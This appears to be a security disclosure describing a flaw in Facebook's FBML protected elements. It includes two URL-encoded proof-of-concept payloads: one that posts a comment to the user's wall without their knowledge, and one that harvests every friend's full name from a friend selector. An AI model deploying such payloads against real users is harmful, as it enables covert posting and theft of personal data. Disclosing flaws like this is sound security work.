In a Facebook FBML application some elements are protected with fb_protected=”true”. When transversing the elements with getElementsByTagName sub elements of the protected element can be accessed.

A malicious application would place a comment box inside a facebook application or in an iframe with http://www.facebook.com/plugins/serverfbml.php. The site would then use the javascript call getElementsByTagName to locate the textarea and use setValue to fill it out. The same technique could be used to set the “Post on wall” checkbox. Finally getElementsByTagName call would then find the only form instance and call the submit function to post the new comment. This would be 100% automated and transparent to the user.

Personal Information (all friends and groups) Leakage

An FBML mutly-friend selector is used. Then applying the same technique as above the malicious application can locate all links inside the elements. The links contain a title attribute with each friends full name (ele.getTitle). The neighboring div contains a background style that can also be read to get the friends profile picture and user ID.

  • How do you reproduce the issues?

Comment box with wall post.

iFramed URL via serverfbml.php: http://www.facebook.com/plugins/serverfbml.php?api_key=8725050364&fbml=%3Cdiv%20id%3D%22c%22%3E%3Cfb%3Acomments%20xid%3D%22xxx%22%20canpost%3D%22true%22%20candelete%3D%22false%22%3E%3C%2Ffb%3Acomments%3E%3C%2Fdiv%3E%0A%3Cscript%3E%0Ac%20%3D%20document.getElementById(‘c’)%3B%0Ac.getElementsByTagName(‘input’)%5B12%5D.setChecked(true)%3B%0Ac.getElementsByTagName(‘textarea’)%5B0%5D.setValue(‘woot%20Content’)%3B%0Ac.getElementsByTagName(‘form’)%5B0%5D.submit()%3B%0A%3C%2Fscript%3E

Personal Information (all friends and groups) Leakage

iFramed URL via serverfbml.php:

http://www.facebook.com/plugins/serverfbml.php?api_key=8725050364&fbml=%3Ctextarea%20id%3D%22out%22%20cols%3D%2250%22%20rows%3D%2210%22%3E%3C%2Ftextarea%3E%0A%3Cdiv%20id%3D%22test%22%3E%0A%3Cfb%3Arequest-form%20type%3D%22t%22%20content%3D%22c%22%20%3E%20%0A%3Cfb%3Amulti-friend-selector%20actiontext%3D%22x%22%20%2F%3E%20%0A%3C%2Ffb%3Arequest-form%3E%0A%3C%2Fdiv%3E%0A%0A%3Cscript%3E%0A%09o%20%3D%20document.getElementById(%27out%27)%3B%0A%09setTimeout(%0A%09function()%7B%0A%09%09ele%20%3D%20document.getElementById(%27test%27)%3B%0A%09%09ele%20%3D%20ele.getElementsByTagName(%27a%27)%3B%0A%09%09for(i%3D0%3B%20i%3Cele.length%3B%20i%2B%2B)%7B%0A%09%09%09name%20%3D%20ele%5Bi%5D.getTitle()%3B%0A%09%09%09%2F%2F.getStyle(%27backgroundImage%27)%09%0A%09%09%09if%20(name)%20o.setValue(o.getValue()%2Bname%2B%22%5Cn%22)%3B%0A%09%09%7D%0A%09%7D%2C%202000)%3B%0A%3C%2Fscript%3E%0A

In this example a text area is simply filled with the user data. In a real life example this data would be sent to the attackers server, or used to send misleading information.